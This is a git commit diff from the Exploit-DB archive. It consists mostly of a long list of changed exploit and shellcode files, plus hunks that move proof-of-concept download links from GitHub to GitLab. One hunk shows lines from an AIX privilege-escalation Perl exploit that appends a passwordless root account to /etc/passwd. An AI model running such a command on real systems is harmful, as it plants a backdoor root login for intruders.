exploits/windows/dos/47113.txt | 2 +- exploits/windows/dos/47259.txt | 2 +- exploits/windows/dos/47260.txt | 2 +- exploits/windows/dos/47261.txt | 2 +- exploits/windows/dos/47262.txt | 2 +- exploits/windows/dos/47263.txt | 2 +- exploits/windows/dos/47264.txt | 2 +- exploits/windows/dos/47265.txt | 2 +- exploits/windows/dos/47266.txt | 2 +- exploits/windows/dos/47267.txt | 2 +- exploits/windows/dos/47268.txt | 2 +- exploits/windows/dos/47269.txt | 2 +- exploits/windows/dos/47270.txt | 2 +- exploits/windows/dos/47271.txt | 2 +- exploits/windows/dos/47272.txt | 2 +- exploits/windows/dos/47273.txt | 2 +- exploits/windows/dos/47274.txt | 2 +- exploits/windows/dos/47275.txt | 2 +- exploits/windows/dos/47276.txt | 2 +- exploits/windows/dos/47277.txt | 2 +- exploits/windows/dos/47278.txt | 2 +- exploits/windows/dos/47279.txt | 2 +- exploits/windows/dos/47381.txt | 2 +- exploits/windows/dos/47382.txt | 2 +- exploits/windows/dos/47414.txt | 2 +- exploits/windows/dos/47484.txt | 2 +- exploits/windows/dos/47485.txt | 2 +- exploits/windows/dos/47486.txt | 2 +- exploits/windows/dos/47487.txt | 2 +- exploits/windows/dos/47488.txt | 2 +- exploits/windows/dos/47489.txt | 2 +- exploits/windows/dos/47528.txt | 2 +- exploits/windows/dos/47609.txt | 2 +- exploits/windows/dos/47610.txt | 2 +- exploits/windows/dos/47769.txt | 2 +- exploits/windows/dos/47964.cpp | 4 +- exploits/windows/dos/48216.md | 2 +- exploits/windows/dos/5327.txt | 2 +- exploits/windows/dos/5687.txt | 2 +- exploits/windows/dos/6330.txt | 2 +- exploits/windows/dos/6560.txt | 2 +- exploits/windows/dos/6565.txt | 2 +- exploits/windows/dos/6616.txt | 2 +- exploits/windows/dos/6658.txt | 2 +- exploits/windows/dos/6732.txt | 2 +- exploits/windows/dos/677.txt | 2 +- exploits/windows/dos/6824.txt | 2 +- exploits/windows/dos/7178.txt | 2 +- exploits/windows/dos/770.txt | 2 +- exploits/windows/dos/8090.txt | 2 +- exploits/windows/dos/8281.txt | 2 +- exploits/windows/dos/8306.txt | 2 +- exploits/windows/dos/8837.txt | 2 +- exploits/windows/dos/9167.txt | 2 +- exploits/windows/dos/9169.py | 2 +- exploits/windows/dos/9170.txt | 2 +- exploits/windows/dos/9417.txt | 2 +- exploits/windows/local/11139.c | 2 +- exploits/windows/local/11199.txt | 4 +- exploits/windows/local/11987.txt | 2 +- exploits/windows/local/12497.c | 2 +- exploits/windows/local/12710.c | 5 +- exploits/windows/local/14403.txt | 2 +- exploits/windows/local/14610.txt | 2 +- exploits/windows/local/14744.c | 2 +- exploits/windows/local/14745.c | 2 +- exploits/windows/local/14746.c | 2 +- exploits/windows/local/14747.c | 2 +- exploits/windows/local/14748.txt | 2 +- exploits/windows/local/14758.c | 2 +- exploits/windows/local/14764.c | 2 +- exploits/windows/local/14765.c | 2 +- exploits/windows/local/14769.c | 2 +- exploits/windows/local/14780.c | 4 +- exploits/windows/local/14944.py | 2 +- exploits/windows/local/14966.py | 2 +- exploits/windows/local/14982.py | 2 +- exploits/windows/local/15022.py | 2 +- exploits/windows/local/15094.py | 2 +- exploits/windows/local/15609.txt | 2 +- exploits/windows/local/15624.txt | 2 +- exploits/windows/local/15696.txt | 2 +- exploits/windows/local/15706.txt | 2 +- exploits/windows/local/15761.txt | 5 +- exploits/windows/local/15762.txt | 4 +- exploits/windows/local/15763.txt | 4 +- exploits/windows/local/15764.txt | 4 +- exploits/windows/local/15994.rb | 2 +- exploits/windows/local/16024.txt | 4 +- exploits/windows/local/17158.txt | 2 +- exploits/windows/local/17473.txt | 2 +- exploits/windows/local/17474.txt | 2 +- exploits/windows/local/17488.txt | 2 +- exploits/windows/local/17820.c | 3 +- exploits/windows/local/18067.txt | 2 +- exploits/windows/local/18372.txt | 2 +- exploits/windows/local/19198.txt | 2 +- exploits/windows/local/19209.c | 2 +- exploits/windows/local/19359.txt | 2 +- exploits/windows/local/19401.txt | 4 +- exploits/windows/local/19425.txt | 2 +- exploits/windows/local/19502.txt | 4 +- exploits/windows/local/19594.txt | 2 +- exploits/windows/local/19633.txt | 2 +- exploits/windows/local/19733.txt | 2 +- exploits/windows/local/19739.txt | 2 +- exploits/windows/local/19789.txt | 2 +- exploits/windows/local/19839.txt | 2 +- exploits/windows/local/19855.txt | 2 +- exploits/windows/local/19894.txt | 2 +- exploits/windows/local/20012.txt | 4 +- exploits/windows/local/20022.txt | 2 +- exploits/windows/local/20257.txt | 2 +- exploits/windows/local/20265.txt | 2 +- exploits/windows/local/20383.txt | 2 +- exploits/windows/local/2094.c | 2 +- exploits/windows/local/21072.txt | 2 +- exploits/windows/local/21096.txt | 2 +- exploits/windows/local/21344.txt | 2 +- exploits/windows/local/21690.txt | 2 +- exploits/windows/local/21691.txt | 2 +- exploits/windows/local/22193.txt | 2 +- exploits/windows/local/23096.txt | 2 +- exploits/windows/local/24200.txt | 3 +- exploits/windows/local/27282.txt | 2 +- exploits/windows/local/29125.txt | 2 +- exploits/windows/local/29374.txt | 2 +- exploits/windows/local/29465.txt | 2 +- exploits/windows/local/29603.txt | 2 +- exploits/windows/local/29695.txt | 2 +- exploits/windows/local/29881.txt | 2 +- exploits/windows/local/30007.txt | 2 +- exploits/windows/local/30192.txt | 2 +- exploits/windows/local/30680.txt | 2 +- exploits/windows/local/30681.txt | 2 +- exploits/windows/local/30999.txt | 2 +- exploits/windows/local/31090.txt | 2 +- exploits/windows/local/31667.txt | 2 +- exploits/windows/local/31895.txt | 2 +- exploits/windows/local/32572.txt | 4 +- exploits/windows/local/3260.txt | 2 +- exploits/windows/local/32771.txt | 2 +- exploits/windows/local/32850.txt | 2 +- exploits/windows/local/32891.txt | 2 +- exploits/windows/local/32892.txt | 2 +- exploits/windows/local/32893.txt | 2 +- exploits/windows/local/34648.txt | 2 +- exploits/windows/local/35019.py | 2 +- exploits/windows/local/35216.py | 2 +- exploits/windows/local/35661.txt | 2 +- exploits/windows/local/35901.txt | 4 +- exploits/windows/local/35902.txt | 4 +- exploits/windows/local/36424.txt | 2 +- exploits/windows/local/3664.txt | 2 +- exploits/windows/local/36826.pl | 2 +- exploits/windows/local/36859.txt | 2 +- exploits/windows/local/36909.rb | 2 +- exploits/windows/local/37049.txt | 6 +- exploits/windows/local/37657.txt | 2 +- exploits/windows/local/37768.txt | 2 +- exploits/windows/local/37799.py | 2 +- exploits/windows/local/37925.txt | 2 +- exploits/windows/local/38198.txt | 2 +- exploits/windows/local/38199.txt | 2 +- exploits/windows/local/38200.txt | 2 +- exploits/windows/local/38201.txt | 2 +- exploits/windows/local/38202.txt | 2 +- exploits/windows/local/38287.txt | 2 +- exploits/windows/local/38289.txt | 2 +- exploits/windows/local/38474.txt | 2 +- exploits/windows/local/38792.txt | 2 +- exploits/windows/local/39310.txt | 2 +- exploits/windows/local/39311.txt | 2 +- exploits/windows/local/39666.txt | 2 +- exploits/windows/local/39694.txt | 2 +- exploits/windows/local/39788.txt | 2 +- exploits/windows/local/39804.txt | 2 +- exploits/windows/local/40040.txt | 2 +- exploits/windows/local/40118.txt | 2 +- exploits/windows/local/40224.txt | 2 +- exploits/windows/local/40426.txt | 2 +- exploits/windows/local/40655.txt | 2 +- exploits/windows/local/40660.txt | 2 +- exploits/windows/local/40823.txt | 2 +- exploits/windows/local/40848.java | 2 +- exploits/windows/local/41015.c | 2 +- exploits/windows/local/41031.txt | 3 +- exploits/windows/local/41144.txt | 2 +- exploits/windows/local/41207.txt | 2 +- exploits/windows/local/4178.txt | 2 +- exploits/windows/local/41902.txt | 2 +- exploits/windows/local/41933.txt | 2 +- exploits/windows/local/42077.txt | 2 +- exploits/windows/local/42325.py | 2 +- exploits/windows/local/42385.py | 2 +- exploits/windows/local/42425.txt | 2 +- exploits/windows/local/42426.txt | 2 +- exploits/windows/local/42537.txt | 2 +- exploits/windows/local/42542.txt | 3 +- exploits/windows/local/42565.py | 2 +- exploits/windows/local/42567.py | 2 +- exploits/windows/local/42568.py | 2 +- exploits/windows/local/42586.py | 3 +- exploits/windows/local/42605.txt | 2 +- exploits/windows/local/42612.py | 2 +- exploits/windows/local/42718.rb | 2 +- exploits/windows/local/42735.c | 3 +- exploits/windows/local/42918.py | 2 +- exploits/windows/local/42921.py | 2 +- exploits/windows/local/43033.py | 2 +- exploits/windows/local/43057.txt | 2 +- exploits/windows/local/43109.c | 2 +- exploits/windows/local/43134.c | 2 +- exploits/windows/local/43162.txt | 2 +- exploits/windows/local/43465.txt | 2 +- exploits/windows/local/43879.txt | 2 +- exploits/windows/local/44147.txt | 2 +- exploits/windows/local/44148.txt | 2 +- exploits/windows/local/44149.txt | 2 +- exploits/windows/local/44152.txt | 2 +- exploits/windows/local/44263.md | 2 +- exploits/windows/local/44267.md | 2 +- exploits/windows/local/44269.txt | 2 +- exploits/windows/local/44315.txt | 2 +- exploits/windows/local/44630.txt | 2 +- exploits/windows/local/44697.txt | 2 +- exploits/windows/local/44742.txt | 2 +- exploits/windows/local/44744.txt | 2 +- exploits/windows/local/44745.txt | 2 +- exploits/windows/local/44888.txt | 2 +- exploits/windows/local/44906.txt | 2 +- exploits/windows/local/45244.txt | 2 +- exploits/windows/local/45280.txt | 2 +- exploits/windows/local/45675.md | 4 +- exploits/windows/local/45893.txt | 2 +- exploits/windows/local/45961.txt | 2 +- exploits/windows/local/46028.txt | 2 +- exploits/windows/local/46040.txt | 2 +- exploits/windows/local/46051.txt | 2 +- exploits/windows/local/46098.txt | 2 +- exploits/windows/local/46104.txt | 2 +- exploits/windows/local/46156.txt | 2 +- exploits/windows/local/46157.txt | 2 +- exploits/windows/local/46158.txt | 2 +- exploits/windows/local/46159.txt | 2 +- exploits/windows/local/46160.txt | 2 +- exploits/windows/local/46161.txt | 2 +- exploits/windows/local/46162.txt | 2 +- exploits/windows/local/46185.txt | 2 +- exploits/windows/local/4625.txt | 2 +- exploits/windows/local/46536.txt | 2 +- exploits/windows/local/46600.txt | 2 +- exploits/windows/local/46601.txt | 2 +- exploits/windows/local/46712.txt | 2 +- exploits/windows/local/46713.txt | 2 +- exploits/windows/local/46714.txt | 2 +- exploits/windows/local/46715.txt | 2 +- exploits/windows/local/46716.txt | 2 +- exploits/windows/local/46717.txt | 2 +- exploits/windows/local/46718.txt | 2 +- exploits/windows/local/46912.txt | 2 +- exploits/windows/local/46916.txt | 2 +- exploits/windows/local/46917.txt | 2 +- exploits/windows/local/46919.txt | 2 +- exploits/windows/local/46920.txt | 2 +- exploits/windows/local/46938.txt | 2 +- exploits/windows/local/46945.cpp | 2 +- exploits/windows/local/46976.txt | 2 +- exploits/windows/local/47115.txt | 2 +- exploits/windows/local/47135.txt | 2 +- exploits/windows/local/47258.txt | 2 +- exploits/windows/local/47306.txt | 2 +- exploits/windows/local/47684.md | 4 +- exploits/windows/local/47714.md | 2 +- exploits/windows/local/47715.md | 2 +- exploits/windows/local/47753.md | 2 +- exploits/windows/local/47754.py | 2 +- exploits/windows/local/47755.c | 2 +- exploits/windows/local/47831.txt | 3 +- exploits/windows/local/47933.rb | 2 +- exploits/windows/local/48071.md | 2 +- exploits/windows/local/48267.txt | 2 +- exploits/windows/local/50653.txt | 22 +- exploits/windows/local/5287.txt | 2 +- exploits/windows/local/5320.txt | 2 +- exploits/windows/local/5442.cpp | 2 +- exploits/windows/local/5518.txt | 2 +- exploits/windows/local/6705.txt | 2 +- exploits/windows/local/6757.txt | 2 +- exploits/windows/local/6994.txt | 2 +- exploits/windows/local/7054.txt | 2 +- exploits/windows/local/7516.txt | 2 +- exploits/windows/local/7533.txt | 2 +- exploits/windows/local/8175.txt | 2 +- exploits/windows/local/8250.txt | 2 +- exploits/windows/local/8280.txt | 2 +- exploits/windows/local/8322.txt | 2 +- exploits/windows/local/8595.txt | 2 +- exploits/windows/local/8782.txt | 2 +- exploits/windows/local/8875.txt | 2 +- exploits/windows/local/9301.txt | 2 +- exploits/windows/local/9579.py | 2 +- exploits/windows/local/9895.txt | 3 +- exploits/windows/remote/10542.py | 2 +- exploits/windows/remote/11173.txt | 2 +- exploits/windows/remote/11661.txt | 2 +- exploits/windows/remote/12614.txt | 2 +- exploits/windows/remote/14179.txt | 2 +- exploits/windows/remote/14267.txt | 2 +- exploits/windows/remote/14275.txt | 2 +- exploits/windows/remote/14385.html | 4 +- exploits/windows/remote/14447.html | 3 +- exploits/windows/remote/14599.txt | 2 +- exploits/windows/remote/14674.txt | 2 +- exploits/windows/remote/14853.py | 2 +- exploits/windows/remote/14886.py | 2 +- exploits/windows/remote/14895.py | 2 +- exploits/windows/remote/15056.py | 2 +- exploits/windows/remote/15235.html | 2 +- exploits/windows/remote/15241.txt | 2 +- exploits/windows/remote/15296.txt | 2 +- exploits/windows/remote/15869.txt | 2 +- exploits/windows/remote/16594.rb | 2 +- exploits/windows/remote/17022.txt | 16 +- exploits/windows/remote/17024.txt | 20 +- exploits/windows/remote/17104.txt | 2 +- exploits/windows/remote/17105.txt | 2 +- exploits/windows/remote/17187.txt | 2 +- exploits/windows/remote/17419.zip | 4 +- exploits/windows/remote/17517.txt | 2 +- exploits/windows/remote/17550.py | 2 +- exploits/windows/remote/17575.txt | 2 +- exploits/windows/remote/17974.html | 4 +- exploits/windows/remote/17977.txt | 2 +- exploits/windows/remote/18016.txt | 2 +- exploits/windows/remote/18437.txt | 2 +- exploits/windows/remote/18531.html | 2 +- exploits/windows/remote/190.c | 6 +- exploits/windows/remote/19094.txt | 2 +- exploits/windows/remote/19245.pl | 2 +- exploits/windows/remote/19435.html | 2 +- exploits/windows/remote/19570.txt | 2 +- exploits/windows/remote/19580.txt | 2 +- exploits/windows/remote/19581.txt | 2 +- exploits/windows/remote/19611.txt | 2 +- exploits/windows/remote/19614.asm | 2 +- exploits/windows/remote/19617.txt | 2 +- exploits/windows/remote/19679.txt | 4 +- exploits/windows/remote/19688.txt | 4 +- exploits/windows/remote/19743.txt | 6 +- exploits/windows/remote/19895.txt | 2 +- exploits/windows/remote/20079.txt | 4 +- exploits/windows/remote/20106.cpp | 2 +- exploits/windows/remote/20184.txt | 2 +- exploits/windows/remote/20240.txt | 4 +- exploits/windows/remote/20283.txt | 2 +- exploits/windows/remote/20284.txt | 2 +- exploits/windows/remote/20334.java | 2 +- exploits/windows/remote/20427.txt | 2 +- exploits/windows/remote/2054.txt | 2 +- exploits/windows/remote/20547.txt | 3 +- exploits/windows/remote/20571.txt | 2 +- exploits/windows/remote/20758.c | 2 +- exploits/windows/remote/20774.txt | 2 +- exploits/windows/remote/20775.txt | 2 +- exploits/windows/remote/20818.txt | 2 +- exploits/windows/remote/20820.c | 4 +- exploits/windows/remote/20840.txt | 2 +- exploits/windows/remote/20841.txt | 2 +- exploits/windows/remote/20842.txt | 2 +- exploits/windows/remote/21169.txt | 2 +- exploits/windows/remote/21196.txt | 2 +- exploits/windows/remote/21199.txt | 2 +- exploits/windows/remote/21542.c | 2 +- exploits/windows/remote/21618.txt | 2 +- exploits/windows/remote/21631.txt | 2 +- exploits/windows/remote/21648.txt | 2 +- exploits/windows/remote/21692.txt | 2 +- exploits/windows/remote/21902.c | 2 +- exploits/windows/remote/21913.txt | 2 +- exploits/windows/remote/22022.txt | 2 +- exploits/windows/remote/22027.txt | 6 +- exploits/windows/remote/22028.txt | 2 +- exploits/windows/remote/22194.txt | 2 +- exploits/windows/remote/22288.txt | 4 +- exploits/windows/remote/22338.txt | 2 +- exploits/windows/remote/22341.txt | 2 +- exploits/windows/remote/22367.txt | 2 +- exploits/windows/remote/22368.txt | 2 +- exploits/windows/remote/22575.txt | 2 +- exploits/windows/remote/22726.txt | 2 +- exploits/windows/remote/22872.txt | 2 +- exploits/windows/remote/22917.txt | 2 +- exploits/windows/remote/22967.txt | 2 +- exploits/windows/remote/23034.txt | 2 +- exploits/windows/remote/23073.txt | 2 +- exploits/windows/remote/23079.txt | 2 +- exploits/windows/remote/23080.txt | 2 +- exploits/windows/remote/23083.txt | 2 +- exploits/windows/remote/23131.txt | 2 +- exploits/windows/remote/23198.txt | 2 +- exploits/windows/remote/23283.txt | 2 +- exploits/windows/remote/23340.txt | 4 +- exploits/windows/remote/23400.txt | 2 +- exploits/windows/remote/23401.txt | 2 +- exploits/windows/remote/23423.txt | 2 +- exploits/windows/remote/23489.txt | 2 +- exploits/windows/remote/23493.txt | 2 +- exploits/windows/remote/23734.c | 4 +- exploits/windows/remote/23758.txt | 2 +- exploits/windows/remote/24017.html | 2 +- exploits/windows/remote/24125.txt | 2 +- exploits/windows/remote/24653.txt | 2 +- exploits/windows/remote/24693.txt | 2 +- exploits/windows/remote/24767.txt | 2 +- exploits/windows/remote/24958.py | 2 +- exploits/windows/remote/25016.txt | 2 +- exploits/windows/remote/25020.txt | 2 +- exploits/windows/remote/25021.txt | 2 +- exploits/windows/remote/25022.txt | 2 +- exploits/windows/remote/25023.txt | 2 +- exploits/windows/remote/25025.txt | 2 +- exploits/windows/remote/25026.txt | 2 +- exploits/windows/remote/25027.txt | 2 +- exploits/windows/remote/25029.txt | 2 +- exploits/windows/remote/25033.txt | 2 +- exploits/windows/remote/25034.txt | 2 +- exploits/windows/remote/25049.txt | 2 +- exploits/windows/remote/25050.txt | 2 +- exploits/windows/remote/25057.txt | 2 +- exploits/windows/remote/25196.txt | 2 +- exploits/windows/remote/25386.txt | 2 +- exploits/windows/remote/25454.txt | 6 +- exploits/windows/remote/25989.txt | 2 +- exploits/windows/remote/27073.txt | 2 +- exploits/windows/remote/27526.txt | 2 +- exploits/windows/remote/27569.txt | 2 +- exploits/windows/remote/27611.txt | 2 +- exploits/windows/remote/27746.txt | 2 +- exploits/windows/remote/27754.txt | 2 +- exploits/windows/remote/27758.txt | 2 +- exploits/windows/remote/27759.txt | 2 +- exploits/windows/remote/27760.txt | 2 +- exploits/windows/remote/27943.txt | 2 +- exploits/windows/remote/28189.txt | 2 +- exploits/windows/remote/28331.txt | 2 +- exploits/windows/remote/29171.txt | 2 +- exploits/windows/remote/29524.txt | 2 +- exploits/windows/remote/29686.txt | 2 +- exploits/windows/remote/29687.py | 3 +- exploits/windows/remote/29688.txt | 2 +- exploits/windows/remote/30211.txt | 2 +- exploits/windows/remote/3022.txt | 2 +- exploits/windows/remote/30537.txt | 2 +- exploits/windows/remote/31032.txt | 2 +- exploits/windows/remote/31056.py | 2 +- exploits/windows/remote/31254.py | 4 +- exploits/windows/remote/31255.py | 4 +- exploits/windows/remote/31409.txt | 2 +- exploits/windows/remote/31583.txt | 2 +- exploits/windows/remote/32339.txt | 2 +- exploits/windows/remote/32699.txt | 2 +- exploits/windows/remote/3274.txt | 2 +- exploits/windows/remote/32851.html | 2 +- exploits/windows/remote/33024.txt | 2 +- exploits/windows/remote/33071.txt | 2 +- exploits/windows/remote/33172.txt | 4 +- exploits/windows/remote/33705.txt | 2 +- exploits/windows/remote/33712.txt | 2 +- exploits/windows/remote/33750.txt | 2 +- exploits/windows/remote/33964.txt | 2 +- exploits/windows/remote/33980.txt | 2 +- exploits/windows/remote/33981.txt | 2 +- exploits/windows/remote/34143.txt | 2 +- exploits/windows/remote/34174.txt | 2 +- exploits/windows/remote/34178.txt | 2 +- exploits/windows/remote/34437.txt | 2 +- exploits/windows/remote/34462.txt | 2 +- exploits/windows/remote/34647.txt | 2 +- exploits/windows/remote/35280.txt | 2 +- exploits/windows/remote/35434.txt | 2 +- exploits/windows/remote/35560.txt | 6 +- exploits/windows/remote/35573.txt | 2 +- exploits/windows/remote/35885.txt | 2 +- exploits/windows/remote/35886.txt | 2 +- exploits/windows/remote/3634.txt | 2 +- exploits/windows/remote/3635.txt | 2 +- exploits/windows/remote/3636.txt | 2 +- exploits/windows/remote/36491.txt | 2 +- exploits/windows/remote/3651.txt | 2 +- exploits/windows/remote/36542.txt | 2 +- exploits/windows/remote/36546.txt | 2 +- exploits/windows/remote/36829.txt | 2 +- exploits/windows/remote/3746.txt | 2 +- exploits/windows/remote/37840.txt | 2 +- exploits/windows/remote/37841.txt | 2 +- exploits/windows/remote/37842.txt | 2 +- exploits/windows/remote/3804.txt | 2 +- exploits/windows/remote/38384.txt | 2 +- exploits/windows/remote/38644.txt | 2 +- exploits/windows/remote/38742.txt | 2 +- exploits/windows/remote/38918.txt | 2 +- exploits/windows/remote/38968.txt | 2 +- exploits/windows/remote/39161.py | 2 +- exploits/windows/remote/39599.txt | 2 +- exploits/windows/remote/39805.txt | 2 +- exploits/windows/remote/40990.txt | 2 +- exploits/windows/remote/41073.py | 7 +- exploits/windows/remote/41479.py | 2 +- exploits/windows/remote/41545.py | 2 +- exploits/windows/remote/418.c | 2 +- exploits/windows/remote/4188.txt | 2 +- exploits/windows/remote/41894.py | 2 +- exploits/windows/remote/41903.txt | 2 +- exploits/windows/remote/41975.txt | 2 +- exploits/windows/remote/42315.py | 2 +- exploits/windows/remote/42557.py | 2 +- exploits/windows/remote/42558.py | 2 +- exploits/windows/remote/42559.py | 2 +- exploits/windows/remote/42560.py | 2 +- exploits/windows/remote/42691.rb | 2 +- exploits/windows/remote/42693.rb | 2 +- exploits/windows/remote/42694.rb | 2 +- exploits/windows/remote/42696.rb | 2 +- exploits/windows/remote/42700.rb | 2 +- exploits/windows/remote/42703.rb | 2 +- exploits/windows/remote/42704.rb | 2 +- exploits/windows/remote/42711.txt | 2 +- exploits/windows/remote/42719.rb | 2 +- exploits/windows/remote/42720.rb | 2 +- exploits/windows/remote/42721.rb | 2 +- exploits/windows/remote/42722.rb | 2 +- exploits/windows/remote/42723.rb | 2 +- exploits/windows/remote/42724.rb | 2 +- exploits/windows/remote/42725.rb | 2 +- exploits/windows/remote/42778.py | 2 +- exploits/windows/remote/42952.py | 3 +- exploits/windows/remote/42973.py | 2 +- exploits/windows/remote/42984.rb | 2 +- exploits/windows/remote/43025.py | 4 +- exploits/windows/remote/43059.py | 2 +- exploits/windows/remote/43163.txt | 2 +- exploits/windows/remote/4334.txt | 2 +- exploits/windows/remote/44453.md | 2 +- exploits/windows/remote/44582.txt | 2 +- exploits/windows/remote/44987.txt | 2 +- exploits/windows/remote/45502.txt | 2 +- exploits/windows/remote/46220.txt | 2 +- exploits/windows/remote/4664.txt | 2 +- exploits/windows/remote/4699.txt | 2 +- exploits/windows/remote/4715.txt | 2 +- exploits/windows/remote/4760.txt | 2 +- exploits/windows/remote/48537.py | 2 +- exploits/windows/remote/4906.txt | 2 +- exploits/windows/remote/4948.txt | 2 +- exploits/windows/remote/4949.txt | 2 +- exploits/windows/remote/5213.txt | 2 +- exploits/windows/remote/6004.txt | 2 +- exploits/windows/remote/6367.txt | 2 +- exploits/windows/remote/6656.txt | 2 +- exploits/windows/remote/6841.txt | 2 +- exploits/windows/remote/7125.txt | 2 +- exploits/windows/remote/7403.txt | 2 +- exploits/windows/remote/8173.txt | 2 +- exploits/windows/remote/8704.txt | 2 +- exploits/windows/remote/8938.txt | 2 +- exploits/windows/remote/986.html | 4 +- exploits/windows/remote/9905.cpp | 3 +- exploits/windows/webapps/11243.txt | 2 +- exploits/windows/webapps/17388.txt | 2 +- exploits/windows/webapps/18077.txt | 2 +- exploits/windows/webapps/19525.txt | 2 +- exploits/windows/webapps/23132.py | 2 +- exploits/windows/webapps/31221.txt | 2 +- exploits/windows/webapps/39573.txt | 2 +- exploits/windows/webapps/42699.rb | 2 +- exploits/windows/webapps/42705.rb | 2 +- exploits/windows/webapps/42706.rb | 2 +- exploits/windows/webapps/42953.txt | 2 +- exploits/windows/webapps/43018.html | 2 +- exploits/windows/webapps/43019.txt | 2 +- exploits/windows/webapps/43129.txt | 2 +- exploits/windows/webapps/43883.txt | 2 +- exploits/windows_x86-64/dos/39043.txt | 2 +- exploits/windows_x86-64/dos/39072.txt | 2 +- exploits/windows_x86-64/dos/39221.txt | 2 +- exploits/windows_x86-64/dos/39712.txt | 2 +- exploits/windows_x86-64/dos/40196.txt | 2 +- exploits/windows_x86-64/local/20861.txt | 2 +- exploits/windows_x86-64/local/39035.txt | 2 +- exploits/windows_x86-64/local/39520.txt | 2 +- exploits/windows_x86-64/local/40336.py | 4 +- exploits/windows_x86-64/local/40337.py | 4 +- exploits/windows_x86-64/local/41020.c | 2 +- exploits/windows_x86-64/local/41605.txt | 2 +- exploits/windows_x86-64/local/41908.txt | 2 +- exploits/windows_x86-64/local/42435.txt | 2 +- exploits/windows_x86-64/local/42960.txt | 2 +- exploits/windows_x86-64/local/44313.txt | 2 +- exploits/windows_x86-64/local/47685.txt | 2 +- exploits/windows_x86-64/local/47752.js | 2 +- exploits/windows_x86-64/local/47935.cpp | 2 +- exploits/windows_x86/dos/15214.py | 2 +- exploits/windows_x86/dos/37881.txt | 2 +- exploits/windows_x86/dos/38265.txt | 2 +- exploits/windows_x86/dos/38266.txt | 2 +- exploits/windows_x86/dos/38267.txt | 2 +- exploits/windows_x86/dos/38268.txt | 2 +- exploits/windows_x86/dos/38269.txt | 2 +- exploits/windows_x86/dos/38270.txt | 2 +- exploits/windows_x86/dos/38271.txt | 2 +- exploits/windows_x86/dos/38273.txt | 2 +- exploits/windows_x86/dos/38274.txt | 2 +- exploits/windows_x86/dos/38275.txt | 2 +- exploits/windows_x86/dos/38276.txt | 2 +- exploits/windows_x86/dos/38277.txt | 2 +- exploits/windows_x86/dos/38278.txt | 2 +- exploits/windows_x86/dos/38279.txt | 2 +- exploits/windows_x86/dos/38280.txt | 2 +- exploits/windows_x86/dos/38307.txt | 2 +- exploits/windows_x86/dos/39026.txt | 2 +- exploits/windows_x86/dos/39027.txt | 2 +- exploits/windows_x86/dos/39993.txt | 2 +- exploits/windows_x86/local/38403.txt | 2 +- exploits/windows_x86/local/39432.c | 2 +- exploits/windows_x86/local/40039.cpp | 2 +- exploits/windows_x86/local/42432.cpp | 2 +- exploits/windows_x86/local/42930.txt | 3 +- exploits/windows_x86/local/43366.md | 2 +- exploits/windows_x86/local/46918.txt | 2 +- exploits/windows_x86/local/47176.cpp | 2 +- exploits/windows_x86/local/8799.txt | 2 +- exploits/windows_x86/remote/11615.txt | 2 +- exploits/windows_x86/remote/47683.py | 2 +- exploits/windows_x86/webapps/14628.txt | 4 +- exploits/xml/webapps/41855.sh | 2 +- exploits/xml/webapps/42089.txt | 2 +- exploits/xml/webapps/43009.txt | 2 +- shellcodes/arm/42646.c | 2 +- shellcodes/arm/42647.c | 2 +- shellcodes/generator/46696.py | 2 +- shellcodes/linux_x86-64/39149.c | 3 +- shellcodes/linux_x86-64/39152.c | 3 +- shellcodes/linux_x86-64/39312.c | 3 +- shellcodes/linux_x86-64/39390.c | 3 +- shellcodes/linux_x86-64/41468.nasm | 2 +- shellcodes/linux_x86-64/41503.nasm | 2 +- shellcodes/linux_x86-64/42791.c | 2 +- shellcodes/linux_x86/13366.txt | 2 +- shellcodes/linux_x86/42594.c | 2 +- shellcodes/linux_x86/42977.c | 3 +- shellcodes/osx/17564.asm | 2 +- shellcodes/windows_x86-64/42992.c | 2 +- shellcodes/windows_x86/13507.txt | 4 +- shellcodes/windows_x86/15879.txt | 2 +- shellcodes/windows_x86/39754.txt | 3 +- 2774 files changed, 3267 insertions(+), 3998 deletions(-) delete mode 100644 exploits/linux/local/30605.c delete mode 100644 exploits/windows/dos/29618.c diff --git a/exploits/aix/local/45938.pl b/exploits/aix/local/45938.pl index 90a14b11f..a5ad603ad 100755 --- a/exploits/aix/local/45938.pl +++ b/exploits/aix/local/45938.pl @@ -138,5 +138,4 @@ print "[-] Cleaning up /etc/passwd and removing /tmp/wow.ksh \n"; $result = `su wow "-c cp /tmp/passwd.backup /etc/passwd && echo 'wow::0:0::/:/usr/bin/ksh' >> /etc/passwd" && rm /tmp/wow.ksh`; print "[-] Done \n"; -print "[+] 'su wow' for root shell \n"; - +print "[+] 'su wow' for root shell \n"; \ No newline at end of file diff --git a/exploits/android/dos/38555.txt b/exploits/android/dos/38555.txt index cf53f2ba7..16adb75be 100644 --- a/exploits/android/dos/38555.txt +++ b/exploits/android/dos/38555.txt @@ -35,4 +35,4 @@ In this code snippet, the data.buf_out.num_planes value is attacker-controlled " Proof-of-concept code to trigger this issue (from a privileged shell) is attached (m2m1shot_compat.c). Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38555.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38555.zip \ No newline at end of file diff --git a/exploits/android/dos/38557.txt b/exploits/android/dos/38557.txt index 8097ae951..f41ee552c 100644 --- a/exploits/android/dos/38557.txt +++ b/exploits/android/dos/38557.txt @@ -56,4 +56,4 @@ One ioctl should have valid data, the other should fail At this point ctx->mm will now have invalid or free data (free if the forked process dies). Proof-of-concept code to trigger this condition is attached (fimg2d-lock.c) Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38557.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38557.zip \ No newline at end of file diff --git a/exploits/android/dos/38610.txt b/exploits/android/dos/38610.txt index 822e9e8e6..0e41d5426 100644 --- a/exploits/android/dos/38610.txt +++ b/exploits/android/dos/38610.txt @@ -26,4 +26,4 @@ I/DEBUG ( 2958): #03 pc 000000000042ec00 /system/priv-app/SecGallery2015/ To reproduce, download the file and open it in Gallery Proof of Concept: -https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/38610.zip \ No newline at end of file +https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38610.zip \ No newline at end of file diff --git a/exploits/android/dos/38611.txt b/exploits/android/dos/38611.txt index 869ff4538..7a0c63f44 100644 --- a/exploits/android/dos/38611.txt +++ b/exploits/android/dos/38611.txt @@ -31,4 +31,4 @@ To 